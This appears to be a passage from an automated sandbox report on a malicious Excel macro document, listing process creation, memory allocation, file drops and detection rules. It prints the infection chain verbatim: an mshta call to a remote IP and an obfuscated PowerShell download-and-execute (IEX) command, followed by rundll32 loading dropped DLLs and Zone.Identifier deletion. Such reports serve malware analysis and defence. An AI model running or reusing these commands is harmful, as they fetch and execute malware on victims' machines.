                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00239BCF13_2_00239BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00229DCF13_2_00229DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E5CF13_2_0022E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00237DD513_2_00237DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00222BD913_2_00222BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030F8FD14_2_0030F8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E99114_2_0030E991
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030AB8714_2_0030AB87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031C63114_2_0031C631
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031AA3014_2_0031AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031F43514_2_0031F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00307C3714_2_00307C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320E3A14_2_00320E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031AC3A14_2_0031AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00303C3C14_2_00303C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00303E3F14_2_00303E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031BE2714_2_0031BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030901114_2_00309011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030481614_2_00304816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320C1414_2_00320C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031000114_2_00310001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031860614_2_00318606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031907F14_2_0031907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00305E6014_2_00305E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031A66614_2_0031A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031AE6D14_2_0031AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030205114_2_00302051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030225114_2_00302251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00310E5314_2_00310E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0032005614_2_00320056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00301A5614_2_00301A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00304C5D14_2_00304C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00316C4914_2_00316C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031044F14_2_0031044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003070B314_2_003070B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003120BA14_2_003120BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030EA9914_2_0030EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030F09B14_2_0030F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030EE8114_2_0030EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031188914_2_00311889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DCF714_2_0031DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030AEFB14_2_0030AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003064E214_2_003064E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00304EE314_2_00304EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031A2E814_2_0031A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00319EEC14_2_00319EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030D6D814_2_0030D6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DEDC14_2_0031DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00315CC414_2_00315CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030B2C714_2_0030B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003166CA14_2_003166CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E2CC14_2_0030E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00320F3314_2_00320F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030773514_2_00307735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031473C14_2_0031473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00308B3D14_2_00308B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031BB2314_2_0031BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00306D2414_2_00306D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030971414_2_00309714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031411614_2_00314116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031851914_2_00318519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00310B1914_2_00310B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030BB7E14_2_0030BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030536114_2_00305361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030896914_2_00308969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031176B14_2_0031176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031255014_2_00312550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031CB5B14_2_0031CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030A55F14_2_0030A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030434614_2_00304346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030CF4714_2_0030CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030554814_2_00305548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031894B14_2_0031894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030B74D14_2_0030B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003209B514_2_003209B5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003081B714_2_003081B7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003051BB14_2_003051BB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031C3A014_2_0031C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00317BA614_2_00317BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003213AD14_2_003213AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031E39514_2_0031E395
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309B8314_2_00309B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314B8714_2_00314B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031D38914_2_0031D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00307FF214_2_00307FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003059F214_2_003059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030DFF314_2_0030DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00316DF814_2_00316DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003195FA14_2_003195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00318BE314_2_00318BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DBEA14_2_0031DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00317DD514_2_00317DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00302BD914_2_00302BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00319BCF14_2_00319BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309DCF14_2_00309DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E5CF14_2_0030E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040044F15_2_0040044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F901115_2_003F9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003FF8FD15_2_003FF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004020BA15_2_004020BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040411615_2_00404116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040473C15_2_0040473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F7FF215_2_003F7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004113AD15_2_004113AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F3E3F15_2_003F3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F3C3C15_2_003F3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F7C3715_2_003F7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00406C4915_2_00406C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00400E5315_2_00400E53
                            Source: 476C.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: CJ68000754184.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: CJ68000754184.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E249 DeleteService,13_2_0022E249
                            Source: CJ68000754184.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: CJ68000754184.xlsOLE indicator, VBA macros: true
                            Source: CJ68000754184.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/9@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: CJ68000754184.xlsOLE indicator, Workbook stream: true
                            Source: CJ68000754184.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: CJ68000754184.xlsVirustotal: Detection: 13%
                            Source: CJ68000754184.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K......h.b.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k....................................}..v....@.......0...............................T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k..... ..............................}..v............0...............h.b.............T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k....................................}..v............0...............................T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k....H.b.............................}..v............0.................b.............T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................!k....................................}..v............0...............................T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................!k......b.............................}..v....X.......0...............x.b.............T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............x.!k....E...............................}..v............0...............H.b.............T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............x.!k....E...............................}..v............0...............H.b.............T...............Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............x.......:.......T...............Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVvJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE436.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: 476C.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038808D0 push 8B49032Eh; iretd 4_3_038808D5
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038800BE push 8B49032Eh; iretd 4_3_038800C4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10032B7D push ecx; ret 12_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030DFF push ecx; ret 12_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x9130d
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
